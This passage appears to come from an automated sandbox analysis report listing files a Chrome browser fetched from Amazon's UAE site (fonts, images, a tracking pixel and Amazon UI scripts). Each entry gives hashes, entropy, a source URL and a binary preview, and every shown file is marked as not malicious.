                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 17336, version 1.655
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):17336
                                                                                                                                                                                                        Entropy (8bit):7.986832176880709
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:e5synBGYXpmI4lCKsduXVgswk7BlSOSEtMoFr2h:usyJXpmDlgex73R1qox2h
                                                                                                                                                                                                        MD5:B39E082C6B983705892045FD87E0B9A8
                                                                                                                                                                                                        SHA1:9CC1BB64EB270135F1ADF3A4881C2EE5E7C37BE5
                                                                                                                                                                                                        SHA-256:CB0F25CA005489D2399434C33762F291BD8746714EAE3AA72DE20ACA08EDC458
                                                                                                                                                                                                        SHA-512:DDBB8B598854DD829BEFB27641B1C56F23FCE55283D3FA33F0BFDA1C3B38CE7DC03A799E84902C580BA8A54361D33A49038368C96D9FCDE6A50FE83514774D17
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/WOnTLzkiaEccV7F.woff2
                                                                                                                                                                                                        Preview:wOF2......C...........CS........................?FFTM..8.....@.`..~........!.6.$..F..<.. .....a?webf...5l.......?..`..0p....{..Tj....?%........X.....,..UU.o.J(x...g.HK.I..EW.....<...o.RS.,.D.[Xv.s^SW.<..Y0...@..e...t*...J$%?..BGb.axC.....hc.P...z7/.m...=!........LET.K...N....W..DOc.x~..>!...."V...D.*.v."..tQ.*t.?OG..y3.../.F..qB.%..@..\..*y.2w.7GKB..7).1..p^u...MJ...O.D......m..3..1....5..,...!..x|8Xo.y.!..A w.T...'2.M^&/''...V.D*.Hl......$..D".JeR.L*..d"t...6}.c.2.Zkx.....!A%.q...b....$XJ..SJ...01&*..X.../.@..n....o...........ow.......$.RB.7...L.Ip.........dOU.......O.w.....Y.[k[.^MR ...v...6...>.........uYZ[.-k...Y.L.@...j...../r..`g>..C..R.rw%..`...p.&q..)(.......z...-H..N....)rI%.B..C.B..K.*..u...2.E.t.g.>....?..7._....Z.~....t.'.bj.`.|M.g..fi.X..D.HU.e.Yz..t....dk.t.0...1r.R.v.E.........}....I.?.....%.T.;.`!,.o....B..^.z....b.!BB$Dd.....a}.j!.+..A.A...4"M#"..9..el......A.j..#?"...}...."..#...8k..._.x..|...c........5.H...."-..a.p.p?..b..K....~.*..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2974
                                                                                                                                                                                                        Entropy (8bit):7.783838065415687
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6xxKRTce7RbbYxl2D4y4llhyitJ4qoKo3eYs0+G1lEtbbp8MxQjIzz:TJARTcAbd2/hBkJJeY/LlEtbF8MxQsP
                                                                                                                                                                                                        MD5:7F46081DE151EF8F9A7C6BB270425932
                                                                                                                                                                                                        SHA1:5FAA281FF0ACE8BC9F979DF91CAA898C9F808FA4
                                                                                                                                                                                                        SHA-256:B70C6DCC5355E0EC0DA60CA116E88F5A8E6EED57D1D2B430812155C1B27698D4
                                                                                                                                                                                                        SHA-512:E3840AA124C73CF3FE708D4A228CD2A7FB9AA5AB5A1210CED188BE42540409E62D36CD22E14A8FABD88954E23007746021FE259948DC1F4B39B3A72051D11922
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1.."AQ..2.BRaq....#3Sbcr$C.D.........................................................?..R..R..R..R..R.D......I=...U5..k.m%xt...o[.c...1.W.Q..Dn...{.T."......7..#hiZ...N.....~zIk..~.......K..,..].....q'?(.....it..[{.p..0..<d.H......R..R..R..R..R..R..R.......".gb..Te.....I.UW.fi.f/{..k16?.e..D...v..;2h./+....0....&..ms.....ys<...m(...Z.$.?.G..$.z.N}._..|.~...U..%.I.5.......t....v..h=zf.......m..~..1....z?....o.c.Wi..2.T..$..'-.....:... ..T.:....jCM..-,..^.._GE2.?.p.55.T.*!JR.JR.JR.JR.JR.JR.X.f.qey.....R2.u .0k%P.......-..:s2..d.Qo.1A...d..E.....82C.e....(.*8.....lP"....}p.......cXH....(.to..>a.......V..g.&H.OR.... ~.........+.`.."y..L(..C...`...Mx..5hf......y..:?]......dj.2.:.|.....67zm..L.H#dY..&0.tI.)$,..$H..NE{.k9.9.....2|Q
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11395
                                                                                                                                                                                                        Entropy (8bit):7.900504506758376
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:YFoKfC8FTMzA7MVHeIL4xoeGcH2zL4a4KVCK5GBQks4SzPYeV9S:u68xXGcH8L4a4KVtsez6
                                                                                                                                                                                                        MD5:1BC1451C4CAC3EA83E34C2C383EEF101
                                                                                                                                                                                                        SHA1:F93DFE6BA318BCC442D6C9B961E71CED93B04EF7
                                                                                                                                                                                                        SHA-256:ECB2398C5D0A7E58B133C795847455150F12C20C384F94A825CBA2C0680F8B95
                                                                                                                                                                                                        SHA-512:36B95A4208965CEB6A483CD4387571C4B15835AA48299733552B495EFA77FF09F0B564E9E81ED70C919DF7C5B7F19CE87C19B1AA883517FC752EE865929C504B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259758_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................}.....3.C<.e...%....................6.e.b|.....7...{.|.z.}..{.~..QgB._..,...........\W.<..O@.......y(..9.8ts.......Z.Ws...\!(......1......Z!....=.|...nU..&...u|..U..}.uh.v....'..e_....,........t.:@.....W....v....uk.Z.....~.h..`....O,.+....).....'....H.....tJ......)Wz..}p.....D............m.........U...=........|.Y\.DOJ....]!...KS.5..`........w<.........8u......'_M..[6tQ.............p.....a..5..T...G&.Q......p.....\r...9x......=.n....9pi.f.......r..H...............L\.^.E..\.J1u.-l....&....V..`...........G!....!..........*R'G".1Y..:..a..:I~|..M.g.........`.....E.C.q.H........-...b.W......#..GA-.X.|..7\<......)).1..............J...2ls.....j ...K.=-c3`........0.=..y..|..Z@.......e.........i..).h....)..Fv
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                        MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                        SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                        SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                        SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://aax-eu.amazon.ae/x/px/RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:943.015625,%22v%22:%7B%22p%22:100,%22t%22:1,%22def%22:%22groupm%22%7D,%22ptv%22:1723729088.246,%22ttv%22:1723729088.246%7D"
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3127
                                                                                                                                                                                                        Entropy (8bit):7.8097143692908055
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6AoDiNqIQ6RftdQsiZle7GUcz31VxnMpZ965j+CYHBofPRNu+Ir1o:TFSqkRFHi+71c5znMpr6EC8ofqo
                                                                                                                                                                                                        MD5:F25B0E45F05F68DEE0937378F4D87492
                                                                                                                                                                                                        SHA1:53F7FBD8AA2E89FE6B31F6B39565081C9FEA29AE
                                                                                                                                                                                                        SHA-256:DD9BBFA7E5F17D00458B24A4A2A80F13EA466DC3FCE6670DD2FAEBEA9D602BBC
                                                                                                                                                                                                        SHA-512:784FC94B89E747A4C5956C83DDE4B68A569EF4F25080C6EB7EEFD601BC5530DDC338F5BAFFDBFA8FC766D3C8B69CE5238B129024D150964C70A16D26DE9B39AF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-ezsdz_372x232_ae-en._SY116_CB643136719_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!.1Q".ARq..#Bab.t...2r.................................................!1.A."2..Q............?....""...T. .....+...Z.)...X...kwi.XhfP.-n8.!`..Rs.0""...." ...""...." ...""........R.}.fr%..CTi...&.U]....a>.F-.w.t....m/...eV@7.v...._j.....y{H.U..T-9.....|_A?..>P.*.........y...`.#. ...b"i.9..>.6..N..............b..-;Z..B.}....Bd.....'.)Kn....Z.....'\c4...)S?..O.7.......c.Z..ru\...!.Q.".E......q.|...2..F.L{..]e.po.H.@.....n85_N..V;.{.2..h}.I..""...." ...""...." ..."'/.....0.?..F.....2Q1....Z...&.....q.RU.......D..#..L..1s...^.*..~.a..@..<.+.b.r(W.....Uwf..%.........-.."+}.....3`1/..^>..@......+..?.vYTY..C%..[b..`{.m...Wc.6.y.8j..t...w.:....t....h."....=NBZ.....(3....~..1.4L...T..Z.J0u/i......3...g nx.7>I..s59Y...@..." ...""..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):56755
                                                                                                                                                                                                        Entropy (8bit):7.973406642815217
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:VtMKW43ZIHxIlLasEzXjw4jGeDZbToj4Aig1Ct5Er:NWqORyLdEzz9Qj4Aig0bEr
                                                                                                                                                                                                        MD5:BE236EBEF7B0090BFFCF31A5181B1BAF
                                                                                                                                                                                                        SHA1:0F52B2342A6236339EFAA5A98DCD061884CF9C91
                                                                                                                                                                                                        SHA-256:338A305336D450EEEB81068B22C7A34FF69B43732EB2EDF0EDD6549F12A21416
                                                                                                                                                                                                        SHA-512:FAC9572E8F750BFE0F3985CBF0290E1D5F16505ECEB1F977A1313B9B9D217A8DB7CFA21EB3FC0AABE5D3BF2F76C947B5CD8FA8384AD4A62247467B1A97249970
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986211_UAE_Budget_Store_AE_xsite_baby_essentials_en_400x400_2X._CB644457596_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................;...................................................................................[a.....]...p.6.[..}G.z.+......k..i\..cV...............>`..`....{/X.s.4..p....*...[...&....q..p..........:4.....+i.y.q........+l.lJ....cnp.z.*..........~..N...B6B..k........*..2w.[..a..............h.....'"................6...........?.&[.......>...........+R.... 6o.......D=..ho.[....................Jf,m...=.W.:#.5.#..|.....y5...........h..{..........0.............vK.v[.~S.C..,.s_.@5....."...D9.............c..K........0....w.......Z.07.]........'2...............?.~.]\.eXj......f..X.......ML.;M.@..(.ivc#.{..............@...xx......>3...V..|.Z3..Q.F...B.'.~.i.}..0........a./...........;|5....f.^.f.}..u.(..i....G...&"..e....S.+.....;.&=s.n_o0.._L..".~...........x..u.P..-f..=ssV...{.R..!r}...?.P.}..E.l~L.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 226x212, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11360
                                                                                                                                                                                                        Entropy (8bit):7.940898456032812
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:3HgK8p2IC4A4ptML64cZy+xej9lafSWgs+Q7wb/pO6hbSMeyfM75HH9QOHK:/8pp5Ast2iyDWgsNwFNRSMgzW
                                                                                                                                                                                                        MD5:F49F55D23C77243E51BBD10F175BB5B2
                                                                                                                                                                                                        SHA1:9FB90AF25B5D556EBE05490DAC44F0A2EF1094E5
                                                                                                                                                                                                        SHA-256:598E3943850450F59ECF741CF1402EEEE23E29CD50F7DEC7ECA3FF77B373B44F
                                                                                                                                                                                                        SHA-512:4DB9FBA188FF2D3DF01A9CE0B40F64E845DEE9DC14ACE9C7AB273AFA21830F00296445102D255A817DEF6CFF0A30AD9AC7DF0107088983363972F27455692D11
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/71pFC0n2-AL._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizonte"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4...................................................................]cg.........d.h.NW.u!.['J.._...Z$T.......E.@..u..W....l\|I...i.V.V......G..U.V#k._..yq...^...y..!..I,3..:FR..A.;..{.B.~.u.....K.#.s../.6...ib.....b...<...G.....l.**f....F.........C.i+f.%#@...l..b...z..do..P.......z..Xs.E.c.G.WX..H`&..&NM.o~@-9.I...5vL;Z.e........(7...N..{.|.....V.u.HUc..ti...<.:g.v......udc.#.y.i....9.....*.+.*m."....R.......+Z..'.M...+..:...=+....{...w......+....l.W.G..1.<[.).....jA....w.........=.k.(.......'......@.Zd_5....wh..%E.L.....7.~.s!.X64L.....g.......{X.3..Z.e......iiyP...~....5..Z..Y.9..i..8.[..JC...(ab..1.x.m..=...X..N&sx....,.....].xU....b....$.*..P:....BM.<5....r..Z....3.@.&...s.4....m.2C[.&.X..Z......f3&........~..uY.1.V}]...Dv.w.~0.....Fb.R........Z. ...F-0D
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:C source, ASCII text, with very long lines (608)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):181147
                                                                                                                                                                                                        Entropy (8bit):5.399333328109369
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:7emi3shSYWTwt9VwNSn5qPsMomEW1whuuVIZ:7Vi3scYnVwNSn5qPNomEW1wMuqZ
                                                                                                                                                                                                        MD5:85831553613871261E4BCC9A3CD3ABF4
                                                                                                                                                                                                        SHA1:1CFBE1157C267BD2CE19AD2F19AE4C7C198AC328
                                                                                                                                                                                                        SHA-256:F159E8FFE5FC13AF167254BC6D2F1090774E5322BD3993A81A2A657D4159AA3F
                                                                                                                                                                                                        SHA-512:5B45F985066EE2D47B9A7B3C713FB1EC87AA790F25ED443D4F3A9BDF32FB91A174F88F5FD6481736010546C55DDE6E7413BE9E7A01E6BF54B39FA5CEF72DE6EA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/*. regenerator-runtime -- Copyright (c) 2014-present, Facebook, Inc. -- license (MIT): https://github.com/facebook/regenerator/blob/main/LICENSE */.(function(I){var y=window.AmazonUIPageJS||window.P,p=y._namespace||y.attributeErrors,H=p?p("IdentityWebAuthnAssets",""):y;H.guardFatal?H.guardFatal(I)(H,window):H.execute(function(){I(H,window)})})(function(I,y,p){var H=function(){return function(t,y){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t)){var E=[],H=!0,b=!1,c=p;try{for(var a=t[Symbol.iterator](),e;!(H=(e=a.next()).done)&&(E.push(e.value),!y||E.length!==y);H=!0);}catch(g){b=!0,c=g}finally{try{if(!H&&a["return"])a["return"]()}finally{if(b)throw c;.}}return E}throw new TypeError("Invalid attempt to destructure non-iterable instance");}}(),t="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(p){return typeof p}:function(p){return p&&"function"===typeof Symbol&&p.constructor===Symbol&&p!==Symbol.prototype?"symbol":typeof p},ba;(function(){function E(b
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (609)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):26743
                                                                                                                                                                                                        Entropy (8bit):5.347138627237308
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:f1It/R8qLTNor9iviwO2AMVdnjnTzyFVBIXO6ZkLvnP7w2VxLQ/E2pNeHmnqjUYR:acmgkJVd/zMV56ZkLvxVx8fXoKA
                                                                                                                                                                                                        MD5:ABC38D8868C37FAF892916C89A4E5FBC
                                                                                                                                                                                                        SHA1:469738064CD0AEABAE8B4DAA2B679B587310134A
                                                                                                                                                                                                        SHA-256:FA8ED1F8E3AE60AB5AE81058050107B99A2AE4E5A34192BBAE3E41D35EC2693F
                                                                                                                                                                                                        SHA-512:158840D371AF384897DC3E11E2634F35FEFC895756A31CD4CFAE91325561EFF5CAF5CD4F125A16642BCD2AE6D5073467BF5390B63704A3DC84ED8525FB84C4BC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/11y85pohsPL._RC%7C41JZmnaIUdL.js_.js?AUIClients/AmazonGatewayAuiAssets
                                                                                                                                                                                                        Preview:(function(e){var k=window.AmazonUIPageJS||window.P,l=k._namespace||k.attributeErrors,f=l?l("AmazonHomepageCardAssets",""):k;f.guardFatal?f.guardFatal(e)(f,window):f.execute(function(){e(f,window)})})(function(e,k,l){e.register("gw-video-orchestrator",function(){function f(a,b,g){return 0<a?Math.min(g-a,b-a):0<b?Math.min(b,g):0}function n(a){var b=k.innerHeight||document.documentElement.clientHeight,g=k.innerWidth||document.documentElement.clientWidth;a=a.getBoundingClientRect();var b=f(a.top,a.bottom,.b),g=f(a.left,a.right,g),c=0;if(0<b||0<g)c=b*g;return Math.min(1,Math.max(0,c/((a.bottom-a.top)*(a.right-a.left))))}function p(a,b){return a&&1===a.nodeType&&(a.offsetWidth||a.offsetHeight||a.getClientRects().length)?n(a)<b?!1:!0:!1}function m(a){a=q(a);a!==c&&(c&&c.callback(!1),(c=a)&&"hidden"!==document.visibilityState&&c.callback(!0))}function q(a){if(a)for(var b=d.length;b--;)if(d[b].element===a)return d[b]}function r(a,b){return b.priority-a.priority||n(b.element)-n(a.element)||(a.el
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2641
                                                                                                                                                                                                        Entropy (8bit):7.802611157766169
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rQIWfSbvB6rSGiyhDle8DJEJZVjn9v3FGtW1P2LDbZNAaa:TLIWfSb5Fy7kPN3QtW1PwbZja
                                                                                                                                                                                                        MD5:32BB36DC05797B0D7BB0CDAB044ABF02
                                                                                                                                                                                                        SHA1:A20765DE3D0E1026192E094310F3FCC8F464FF10
                                                                                                                                                                                                        SHA-256:3EDB04C196F083739667AD602EE031EBD82BB8B8855CE38F37AA94BE74293F1A
                                                                                                                                                                                                        SHA-512:E45D0D80AC509F9166C40B3A11E1BDAD7AD2A55F9F48B952C55E8A3D9A88552CC156C7C2A7A1B1010784D46F040AF1C665CB8654B2D9F4A08C93FAC34660E453
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!.1AQ."2q..#RaB.....$c................................................1!A..Q............?...........0..Qi.A#7..H..w....b&...'K.H9..[.1:..M......ooD.j..f...C.G.4......uG...-.&...............1...b[...+@~.@...f.g..W.....VG!Q#.......(...u.a$.Ow<...'m.&>.....:.......l{R.@...UPw.9.n|.C..3Q..x...C<.#X...x.. ...=.q.i.t...&m.......]....dH./Ke...c.ad.W.}k..V....P....k8MkY...$pS.............O...k7.y.K{..sNUGz..............dz....P....Ek.O...J..@..Of.Yc....3.M..d.|.U..v.G..~i.i>=...5.=[.|<..h.&..]..{...=.k.............-J..ePI>.J....h.r./;.._llE....z...>"....._v.98......im..p-.NHW. 2.0Y+W.@U.lS}...>..4u?W.llF.T.me.....D.Vf..5c.B...'...^.{/....6.7....0.7.C.4...%.2r3)....v..;.r..n....F65.zn...:4....q2.Z.0...[op..Y.F..#%.sR.O.u...{r;H.ek.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1870
                                                                                                                                                                                                        Entropy (8bit):7.482047828772314
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6zxzpftLP8C9I2mQkqqoCtGcdK45IYGP0YKpJg0:Tlzb4d2mQhdCS45I7P/M5
                                                                                                                                                                                                        MD5:9269C390D63088EF64FB312CC847C509
                                                                                                                                                                                                        SHA1:3FF02845B184911164546D43C8F4AD6AAD3926EF
                                                                                                                                                                                                        SHA-256:7671F96B975B879403ED7E93F5D22C2FF5EEE2D0260E2960E279588494DEE9E1
                                                                                                                                                                                                        SHA-512:54A737FD7E054BA68CFE2391898685CFD12FFF00FCD139B5BD4278148731329B95AE9C7623208C8A37A6833EB626F7A29EE2D0E720FB9A2991CA98C3F39606EA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712470_372x232_2X_en_AE._SY116_CB560039169_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!1.AQ"q.a.......2BRbr..3................................................1.!.A"2a............?..d.9.@..............J.P..'.C.uZZe.V....g.o....~EwO.j.W...K.Kx.?.*>.2.L...d.w...]......-.8q{o.H.......n.iF..+A.!.t.)<~.o|.5..mY.N....S.|..[.......................q.......i&..\..).?..FMF.....)..c.T5.;.jP.)U.O[jI&.^...'....eO.N.y.mn."....k..s....B.o.:.....8...........R.J.N.O....<....I.z..*.M.^.....I-...+..9.....l....Gu.qp...~3..'..k.,,.6.}....."...;{.xgS....-..,....r.Mi..l.............0V..m..MG..|s..U.B.....e.9..-V......Q4...T.i.7(..6Y..e}_Qvz.K.R....B.9I...1X...e...i..U.jJ..mEO.....,...9e.Z.>....\..J.O.X..F..._\R..$.m.6..}Y.:}:}5-}...S.....>Xk.".....J.....x.)|...ey%...;...%...........^....,.sJ.YC....(.T.t..UYy....4..........K7k..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12760
                                                                                                                                                                                                        Entropy (8bit):7.867230026539512
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:l7dk2Orjgid5HhJ4Kg+4ZHp2vd4dkNsoW+86mg6FXDKCzAUe2:RdPi5Hh++4ZHOQX6Z6FXWEAI
                                                                                                                                                                                                        MD5:C2CA6BA77213FF8B7D1974A9DF19F431
                                                                                                                                                                                                        SHA1:EF238DF0F5FFA85CAF607C2977492C594871ECBF
                                                                                                                                                                                                        SHA-256:F9FC14C3C36877E7F47ACF74F30CE374EB76CAFCC2D5AD2D44F1442F0CDCD9F1
                                                                                                                                                                                                        SHA-512:ED382BFC7629288132FE93944AC9030B45DC152DCE7D5EDDE5BC2259E36F67377BFB9647A07324FFD0528FD5122E1C0D8174D2F0F1470BE19F4E951C854DCF18
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/416xoG90KZL._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5...................................................................................................................................................................G..u-I...x/.>..L{..t2+....]L...#..&Fc..Bc..$1.&GPW............i.zS......Z}....uwP2.3....f../.L...N.sHj.e-.`.o,.U......su.F.7T.*n.NgK....Y~....[..<...........m.T.uh..uiC...8n.R.._~..R.+..7....s.s.dd....<.s...|..Q.....nu.<....~..-.;...ZM....e...,............j.n:.D...p..w..zw...."...S_O%O.qqs.\.g.W.?.....=.....Y.:V.LP..S.e...vK.b.q..=........e@.........E...q.<uD...;h..v.7Zw:.-..1n....Gr^U.6S..p.D... cz...u..&={{h.M.Y.**j.Z.......6.7..,..k._.....T..........E.e..v.X....m.<.kfy;.a]83>.......*...n.v.=c[...].....K.mxi.*..h.+h.6"^...j..l[4ch.Ok~..7TwX...........5..u.^"{[w..|....N].....a[......9CVH[:.....{E..gb1~Y...}8.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1474646
                                                                                                                                                                                                        Entropy (8bit):5.964126504478192
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:pDSWZhjZ3LSqo6aJ8p2A3rzjZZQAK+d66CUdSjsfbWXT4qFxqqxzcIxAvxp/Viji:hBZhjpSl6aJpmdxt9D
                                                                                                                                                                                                        MD5:9AF52EA3FDDD0BD9AAC73FADED226511
                                                                                                                                                                                                        SHA1:E62BEF9E52ECDDD181042EB6B010972954F8170D
                                                                                                                                                                                                        SHA-256:8ABD6D4BFA3E53B8360C53556DFA3380DD0F6BE51BB5503CCB49542DE3E0739B
                                                                                                                                                                                                        SHA-512:7E7D3EEE938905DCF94082FF23EF97EC40CF9C7E187D2D6A83F133B07B10596F422F9F327F1FDFC5075D6EE68EC8BBB7A901B144CCB2A9454E6E548915A27D6B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/A1btY8gxJ3L.js?AUIClients/ACICAssets
                                                                                                                                                                                                        Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("ACICAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET ACICAssets - 1.0./////////////////////////.// BEGIN FILE js/acic.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/./******
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 400 x 900, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16237
